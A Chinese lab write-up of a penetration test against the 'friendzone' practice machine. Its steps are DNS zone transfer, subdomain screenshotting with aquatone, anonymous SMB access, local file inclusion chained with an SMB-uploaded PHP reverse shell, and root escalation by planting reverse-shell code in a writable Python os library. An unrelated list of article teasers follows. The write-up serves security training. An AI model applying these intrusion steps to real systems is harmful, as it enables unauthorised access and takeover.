网络安全实战:记一次比较完整的靶机渗透

news2025/1/13 14:24:56

0x01信息搜集

nmap -sC -sV -p- -A 10.10.10.123 -T4 -oA nmap_friendzone

1664468256_6335c520c45fd6d08464f.png

访问80端口的http服务只发现了一个域名。
image.png

0x02 DNS区域传输

因为我们前面扫描的时候发现了53端口是开着一个dns服务的,所以尝试使用friendzoneportal.red进行axfr,它的具体含义简单来说就是使用dig命令向服务器发送一个axfr的请求,如果服务器支持axfr,那么就会把请求的域对应的所有的dns记录都返回给请求者。

【一一帮助安全学习,所有资源获取处一一】
①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部视频资源

英文:portal    汉语:统一门户平台

1664468274_6335c532774f80c43d17c.png

通过上图我们发现,服务器竟然支持了我们的axfr请求,返回给了我们请求域中所有的dns记录,既然我们拿到了当前域中所有的子域名,那么我们就可以把这些子域名都加到kali的hosts文件中。

补充知识:从安全配置的角度出发,服务器是不应当响应每个人的axfr请求的,它应该是只在同一域中主、备服务器之间使用的请求,通常用于实现主、备dns服务器间同步dns记录的作用。这里dns服务器响应了我们的axfr请求,其实是说明了该dns服务器存在配置不当的的问题的。

然后又尝试使用friendzone.red进行axfx。

dig axfr friendzone.red @10.10.10.123

1664468285_6335c53ddc9cf024647f4.png

使用shell命令对输出结果进行过滤和去重

dig axfr friendzoneportal.red @10.10.10.123 |grep 604800|awk '{print $1}'|sed s/.$//g|sort|uniq
dig axfr friendzone.red @10.10.10.123 |grep 604800|awk '{print $1}'|sed s/.$//g|sort|uniq
#解析shell命令
grep 604800     匹配含有604800数字的行
awk'{print $1}' 将一行中以空格为分割符的第一个字段打印出来
sed s/.$//g     将以点结尾的字符串末尾的点替换为空
sort            排序
uniq            删除文件中的重复行

我们可以看到通过上面这些命令的处理,我们得到了好多域名。
image.png

然后把这些域名都加入到/etc/hosts里面

administrator1.friendzone.red friendzone.red hr.friendzone.red uploads.friendzone.red admin.friendzoneportal.red files.friendzoneportal.red friendzoneportal.red imports.friendzoneportal.red 

因为这么多域名我们不可能挨个去手动访问,所以我们这里用工具来批量测试,在使用工具之前,我们需要首先把所有的域名放到一个文件里面,我这里放在了name文件里,然后我们通过如下简单的shell脚本,把这些域名处理成工具可以识别的url链接并写入到名为url的文件中,便于我们下一步的利用。

for i in $(cat name);do echo https://$i >>url;done
for i in $(cat name);do echo http://$i >>url;done

1664468314_6335c55a2080ce3e5a032.png

我这里推荐一个好用的工具aquatone,之所以推荐它是因为我觉得它解决了我们在渗透测试过程中的一个痛点,例如我们在HW打点或者日常渗透的过程中,经常会遇到通过类似fofa这种搜索引擎或者其他的途径搜集到了大量的资产链接,虽然fofa之类的搜索引擎会显示资产的访问状态,但往往与当下该资产的访问状态有差异,因此手工判断的话效率会很低,但是使用了这个工具后就会方便很多,我们直接把所有资产的URL链接放到一个文件里,使用这个工具直接测试一下就行了,该工具会直接显示这些资产当下的访问状态,并截屏,当扫描结束后,会直接出一个html的报告,十分的方便。

#这个工具的下载命令我直接放这里了! 
sudo apt install chromium-l10n
wget https://github.com/michenriksen/aquatone/releases/download/v1.7.0/aquatone_linux_amd64_1.7.0.zip
unzip aquatone_linux_amd64_1.7.0.zip
sudo rm -rif aquatone_linux_amd64_1.7.0.zip LICENSE.txt README-cloudshell.txt
sudo mv aquatone /usr/local/bin

cat url |aquatone

1664468324_6335c56405463ff27e8b8.png

下图是该工具出的报告。
1664468337_6335c571c5f44d71047da.png

我从报告中找到这么一个页面,尝试爆破后没结果,暂时放这。
1664468354_6335c5824d99c61797bdc.png

0x03 SMB文件上传

因为前面nmap扫描结果显示该机器开放了smb服务,我们接下来对smb服务进行一波测试。

crackmapexec smb 10.10.10.123 -u "" -p "" --shares

1664468362_6335c58a16ad0f2f4427d.png

发现Development 目录具有读权限和写权限,general目录有读权限。

smbclient //10.10.10.123/genera

image.png

通过找到的密码尝试登录。

admin:WORKWORKHhallelujah@#

image.png

成功进入后台。

0x04文件包含

根据页面提示加上如下参数后访问,发现出来一个时间戳。
image.png

image.png

怀疑此处存在文件包含于是进行测试。
image.png

通过上图我们可以看到,此处的确是存在一个本地文件包含漏洞,现在我们尝试读取dashboard文件,我们来看看它代码是怎么写的。
image.png

我们可以看到它直接通过get传参给include,然后后面接了.php。
image.png

结合之前发现的smb服务Development目录下的写权限,此时getshell的思路就很清晰了,先通过smb服务上传到Development目录下一个含有反弹shell代码的php文件,然后利用此处的文件包含漏洞即可getshell。
image.png

0x05权限提升

python3 -m http.server 80

wget 10.10.16.3/linpeas.sh

我们在linpeas.sh的报告中看到如下文件,发现我们竟然对python的OS库有写权限。
image.png

那我们接下来就传pspy64到该机器上来,然后看看有没有以root用户定期执行的py脚本调用了os库,如果有的话,我们在OS库中写入反弹shell的代码,这样当该脚本被执行时,我们就会获得一个root权限的shell。
image.png

1664468494_6335c60e09a1b24d97676.png

然后如上图所示,我们看到这个脚本是以root权限运行的,并且该脚本调用了OS库,所以接下来我们只需要在OS库中写入反弹shell的代码即可,如下图所示。
image.png

上图框中的代码就是我们加到os.py文件末尾反弹shell的代码,通过下图我们可以看到root权限的shell已经弹回来了。
image.png
friendzone靶机算是一个中等难度的靶机,知识点涉及到了DNS区域传输、SMB文件上传、文件包含、以及非常规的linux提权等知识。

总的来说,还是学到不少知识,包括DNS区域传输,SMB文件上传配合文件包含漏洞getshell,利用写入OS库恶意代码配合定时任务成功提权至root权限。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/20.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

《软件测试》实验2:嵌入式软件测试实验报告

文章目录实验目的温度控制器需求文档及测试要求环境搭建实验内容温度采集处理功能测试加热棒输出电压测试散热风扇温度传感器输入接口(Senser_JK)控制加热棒输出接口(Heater_JK)控制散热风扇输出接口(Fan_JK&#xff0…

目标检测 YOLOv5 - 模型推理预处理 letterbox

目标检测 YOLOv5 - 模型推理预处理 letterbox flyfish 版本:YOLOv5 6.2 假如图片大小是1080 * 1920 (height * width ) width 1920 height 1080 当模型输入是 640 * 640时 shapes (1080, 1920), (0.33, 0.33), (0.0, 140.0) 640/ 1920…

c++11 右值引用和移动语义

文章目录1. 左值引用和右值引用2. 左值引用与右值引用比较3. 右值引用使用场景和意义3.1左值引用的使用场景3.2左值引用的短板:3.3 移动构造3.4 移动赋值3.5 STL中的容器3.6 右值引用引用左值及其一些更深入的使用场景分析3.7 STL容器插入接口函数也增加了右值引用版…

Springboot 使用装饰器模式,快看,它装起来了

前言 小飞棍来咯! 本篇文章跟小飞棍一毛钱关系没有。 本篇内容: 就是配合实战案例介绍我们平时 在springboot项目里面 怎么去用 装饰器模式、多层装饰怎么玩。 正文 首先先说下装饰器模式是什么 官方: 装饰器模式(Decorator Pa…

Python3,5行代码,制作Gif动图,太简单了。

gif动图制作1、引言2、代码实战2.1 安装2.2 代码3、总结1、引言 小屌丝:鱼哥, 你能不能帮我找一个动图, 小鱼:啥动图,你自己百度不就行了。 小屌丝:我这不是没找到吗, 不然我就自己来找了。 小…

Oracle数据库:net configureation assistant工具配置监听listener,配置本地网络访问服务器上的数据库

Oracle数据库:net configureation assistant工具配置监听listener,配置本地网络访问服务器上的数据库 2022找工作是学历、能力和运气的超强结合体,遇到寒冬,大厂不招人,可能很多算法学生都得去找开发,测开…

图像类找工作面试题(二)——常见问题大总结

文章目录一、深度学习问题1、目标检测系列(1)介绍目标检测网络YOLO以及SSD系列原理。(2)YOLO对小目标检测效果不好的原因,怎么改善?(3)怎么防止过拟合(4)Drop…

Ubuntu18.04LTS环境下创建OpenCV4.x-Android库

1 背景 1.1 java.lang.UnsatisfiedLinkError: dlopen failed: library “libc_shared.so” not found libc_shared.so 之前默认集成在 opencv_java3.so,但是在OpenCV4.x以后,该动态库默认不集成在opencv_java4.so。 1.2 E/OpenCV/StaticHelper: OpenC…

NLP学习之:Bert 模型复现(1)任务分析 + 训练数据集构造

​ 文章目录代码资源原理学习任务代码讲解代码重写说明代码资源 Bert-pytorch 原理 学习任务 Bert 本质上是 Transformer 的 Encoder 端,Bert 在预训练时最基本的任务就是: 判断输入的两个句子是否真的相邻预测被 [MASK] 掉的单词 通过这两种任务的约…

面了个腾讯拿28k跳槽出来的,真正见识到了跳槽天花板

最近内卷严重,各种跳槽裁员,相信很多小伙伴也在准备金九银十的面试计划。 作为一个入职5年的老人家,目前工资比较乐观,但是我还是会选择跳槽,因为感觉在一个舒适圈待久了,人过得太过安逸,晋升涨…

ToDesk使用

现在的终端产品种类非常的多,常见的包括tablet, 手机,笔记本 ,ipod...等等,这些终端带屏产品连同台式机,智能电视等固定设备占据了我们的工作和生活中的大部分时间,不知道你发现没有,使这些不同种类的产品之…

[机器学习、Spark]Spark MLlib实现数据基本统计

👨‍🎓👨‍🎓博主:发量不足 📑📑本期更新内容:Spark MLlib基本统计 📑📑下篇文章预告:Spark MLlib的分类🔥🔥 简介&…

Java多线程【锁优化与死锁】

Java多线程【锁优化与死锁】🍒一.synchronized的优化🍎1.1基本特点🍎1.2加锁工作过程🍎1.3优化操作🍒二.死锁🍎2.1什么是死锁🍎2.2 一对一死锁🍎2.3 二对二死锁🍎2.4 N对…

Web 1.0、Web 2.0 和 Web 3.0 之间的比较

💂 个人网站:【海拥】【摸鱼小游戏】【神级源码资源网站】🤟 风趣幽默的前端学习课程:👉28个案例趣学前端💅 想寻找共同学习交流、摸鱼划水的小伙伴,请点击【摸鱼学习交流群】💬 免费且实用的 P…

目前最先进的神经网络算法,神经网络算法发展

1、神经网络的发展趋势如何? 神经网络的云集成模式还不是很成熟,应该有发展潜力,但神经网络有自己的硬伤,不知道能够达到怎样的效果,所以决策支持系统中并不是很热门,但是神经网络无视过程的优点也是无可替…

HTML5新特性

H5新增 1) 新增选择器 document.querySelector、document.querySelectorAll doucment.querySelector(#sampel) // 选择id doucment.querySelector(.sampel) // 选择出现的第一个类 doucment.querySelectorAll(.sampel)[0] // 选择出现的第一个类2)拖拽释放(Drag and drop) AP…

2022年江西省赣育杯网络安全大赛学生组WebMisc Writeup

文章目录WEB签到easyzphpezpyMISCbyteMuisc有趣的PDFWEB 签到 ?id-1union select 1,(select group_concat(schema_name) from information_schema.schemata),3,4,5--?id-1union select 1,(select group_concat(table_name) from information_schema.tables where table_sch…